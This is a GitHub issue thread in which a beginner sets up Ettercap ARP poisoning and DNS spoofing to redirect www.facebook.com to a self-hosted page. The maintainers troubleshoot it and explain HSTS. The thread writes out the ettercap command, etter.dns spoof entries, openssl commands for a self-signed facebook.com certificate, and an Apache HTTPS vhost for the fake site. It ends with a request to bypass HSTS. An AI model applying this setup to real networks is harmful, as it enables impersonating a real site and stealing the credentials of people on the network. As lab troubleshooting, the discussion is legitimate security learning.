ricko2991 closed this issue 3 years ago
So maybe the new versions use DNS-over-HTTPS? What could Ettercap do about that? Stop bitching... Edit: Here are some articles on DoH:
Hi, thanks for answering. I have turned off DoH in Firefox, but somehow Chrome doesn't have a setting for it:
I'm looking in Chrome here and can't find a setting to turn off Secure DNS lookups:
chrome: // flags / # dns-over-https
Is this correct?
No, drop the spaces. Should be: chrome://flags/#dns-over-https
And a restart of Chrome is needed.
Yes, I did that in Chrome but I still can't find the Secure DNS lookups setting. I have also disabled DoH in Firefox and the redirect still doesn't work. I get the same error message as in the image above.
Actually you haven't provided any information that is related to Ettercap. The use of DoH doesn't explain why you're getting connection refused. Also, when HSTS results in no user recourse, a different error message is presented. Connection refused is a network-level error, but we cannot help you if you don't make your lab environment transparent.
Hi, this is my lab environment using ettercap: ettercap version 0.8.3.1, OS: Kali Linux
1. This is the domain page to be redirected. I added it in /etc/ettercap/etter.dns
2. I enabled apache2 to serve the link that the target will open. So I already have a page that I created myself, and I hope that it will appear.
3. This is the command I use in ettercap:
ettercap -Tqi eth0 -P dns_spoof -M arp /// ///
4. This is the packet capture for www.facebook.com when I open the link:
5. To find out if I have really infected the router, I check it with the command nslookup www.facebook.com on the target machine, and the DNS answer points to the IP I am using.
Sorry if there are mistakes; this is my first time learning MITM, and I am using ettercap as my test environment tool.
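For reference, a spoof entry in /etc/ettercap/etter.dns typically looks like the sketch below; the IP address is an assumption, substitute your attacker machine's address:

```
# Hypothetical etter.dns entries: answer A-record queries for the
# spoofed domain with the attacker's IP (192.168.1.10 is an assumption).
www.facebook.com  A   192.168.1.10
*.facebook.com    A   192.168.1.10
facebook.com      A   192.168.1.10
```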
OK, thanks. That at least proves that traffic from the client machine is directed to your ettercap machine via ARP poisoning and that the DNS spoofing works. The next question is whether your web server works correctly. Can you check with the CLI HTTP client curl:
curl -v http://www.facebook.com
curl -v https://www.facebook.com
... from the client machine that is poisoned of course
Yes, that's right: when I use http://www.facebook.com
it displays my web page.
But on https://www.facebook.com
connection refused
Why does that happen? Also, when I enter http://www.facebook.com in Chrome, the site (facebook) still refuses the connection.
Ah yes. So this is really due to HSTS. From our wiki in regard to HSTS:
Even when the user types http://www.website.com in the address bar, the browser internally rewrites the http:// to https://.
See RFC6797 Section 8.3 paragraph 5
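For context, that internal http-to-https rewrite kicks in after the site has once delivered a Strict-Transport-Security response header over HTTPS; the values below are only illustrative:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```

Once the browser has cached this policy (or the domain ships in the browser's preload list), plain HTTP requests to that host never leave the machine unencrypted.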
So that means, essentially, that your browser insists on HTTPS because the site is known to the browser as an HTTPS-only website, possibly even due to a pre-configured domain list.
This is essentially the reason for the error message you experience. Your web server doesn't listen on port 443, hence it refuses a connection attempt to it. So you should set your web server up to serve the website over HTTPS as well.
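A minimal sketch of giving the fake server something to present on port 443: generate a self-signed certificate for the spoofed name. The /tmp paths and the CN are assumptions for this lab setup, not part of the original thread:

```shell
# Hypothetical: create a self-signed key and certificate for the
# spoofed hostname (paths and CN are placeholders for the lab).
openssl req -x509 -newkey rsa:2048 -nodes \
  -keyout /tmp/fake-fb.key -out /tmp/fake-fb.crt \
  -days 30 -subj "/CN=www.facebook.com"
```

After that you would still enable Apache's SSL module and point a 443 vhost at the key/cert pair (on Debian-based systems e.g. `a2enmod ssl` plus an enabled SSL site, then restart apache2). The browser will of course warn, because the certificate is self-signed.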
However, you'll probably only get one step further and then run into the HSTS no-user-recourse trouble (RFC6797 Sect. 12.1): the client machine must not experience any "issues" with the certificate. Firefox is even harder, as it apparently caches the signature value of a server certificate once it has been loaded successfully.
OK, I read a little on the wiki; it was probably about the signature of a certificate that the browser must trust, so that the user is allowed to reach the server, right?
And how do I create a certificate that the web browser trusts, so that it doesn't block the web server I created and can open it? Sorry if my question is incompetent, I just want to learn.
As far as I know, Firefox has its own certificate trust store while Chrome leverages the store of the OS. So in Firefox, the easiest way is to add an exception in the Server certificates tab. There you can import the certificate that your web server is using. This should avoid any security warnings.
So here I just need to make a certificate for my website so that it looks legit? That's the problem: I also don't know how to create a certificate for a website. I'm still a beginner and have a lot to learn. But that's okay, I just wanted to ask and find out how DNS spoofing can be blocked.
Or can ettercap make a certificate for me? I also read on the wiki that ettercap provides --certificate and --private-key parameters. Is that also a way to give it a certificate? And how can I do that?
No, this is nothing that helps with your fake-webserver problem. It's related to the on-demand server certificate creation used for SSL interception.
Google it. You'll find many resources that explain how to create a certificate for an Apache web server. In regard to this issue, we found out that DNS spoofing does work, and that it is just the lack of HTTPS support on your fake web server, in combination with the HSTS countermeasures, that produces the behaviour you experience.
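For completeness, a minimal Apache HTTPS vhost for the fake site might look like the sketch below; the file name, paths, and ServerName are all assumptions to adapt to your own setup:

```
# Hypothetical /etc/apache2/sites-available/fake-ssl.conf
<VirtualHost *:443>
    ServerName www.facebook.com
    DocumentRoot /var/www/html
    SSLEngine on
    SSLCertificateFile    /etc/ssl/certs/fake-fb.crt
    SSLCertificateKeyFile /etc/ssl/private/fake-fb.key
</VirtualHost>
```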
Therefore I'll close this issue now. You're free to open a new one if you still feel there is a defect with Ettercap.
Thank you @koeppea
Hi, when I try to attack a site running an old version it works, but when I try another one or the latest version it doesn't work or errors out. Maybe this is because HSTS in the web browser makes it inaccessible, and if it is HSTS, how can I bypass it?